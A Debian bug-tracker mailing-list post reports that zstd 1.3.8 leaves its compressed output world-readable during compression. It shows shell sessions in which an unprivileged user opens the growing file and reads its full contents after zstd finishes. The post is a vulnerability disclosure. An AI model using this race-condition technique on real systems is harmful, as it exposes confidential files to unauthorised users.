[Debian-med-packaging] Bug#981404: compressed file is world readable, while zstd is running
Harald Dunkel
harri at afaics.de
Sat Jan 30 16:34:45 GMT 2021
Package: zstd
Version: 1.3.8+dfsg-3
Severity: critical
Compressing a large file with restricted access permissions a new,
world readable file is created, revealing the contents of the
uncompressed file. Sample:
# whoami
root
# zstd -q -13 -T8 sample.dmp &> zstd.log &
:
:
# ls -al
total 385983012
drwxr-xr-x 2 root root 4096 Jan 30 16:01 .
drwxr-xr-x 35 root root 4096 Jan 30 15:39 ..
-rw------- 1 oracle users 279265214464 Jan 29 22:02 sample.dmp
-rw-r--r-- 1 root root 115981336576 Jan 30 16:25 sample.dmp.zst
-rw-r--r-- 1 root root 0 Jan 30 16:01 zstd.log
:
:
[1]+ Done zstd -q -13 -T8 sample.dmp &> zstd.log
# md5sum sample.dmp.zst
5a3d3401e8e46483659e820f96ad0ef0 sample.dmp.zst
An attacker might be able to open(2) the file while zstd is still
running, wait for zstd to complete its job, and then read(2) the
whole file:
% whoami
attacker
% ls -al
total 465071584
drwxr-xr-x 2 root root 4096 Jan 30 16:01 .
drwxr-xr-x 35 root root 4096 Jan 30 15:39 ..
-rw------- 1 oracle users 279265214464 Jan 29 22:02 sample.dmp
-rw-r--r-- 1 root root 196968022016 Jan 30 16:41 sample.dmp.zst
-rw-r--r-- 1 root root 0 Jan 30 16:01 zstd.log
% md5sum sample.dmp.zst
^Z
[1]+ Stopped md5sum sample.dmp.zst
:
:
% ls -al
total 475580484
drwxr-xr-x 2 root root 4096 Jan 30 16:01 .
drwxr-xr-x 35 root root 4096 Jan 30 15:39 ..
-rw------- 1 oracle users 279265214464 Jan 29 22:02 sample.dmp
-rw------- 1 oracle users 207729131801 Jan 29 22:02 sample.dmp.zst
-rw-r--r-- 1 root root 0 Jan 30 16:01 zstd.log
% fg
md5sum sample.dmp.zst
5a3d3401e8e46483659e820f96ad0ef0 sample.dmp.zst
%
In this sample session the attacker got the correct md5sum, just for
demonstation purposes. Hi could have created his own private copy in
the same way.
This makes zstd unusable for me.
Regards
Harri
More information about the Debian-med-packaging
mailing list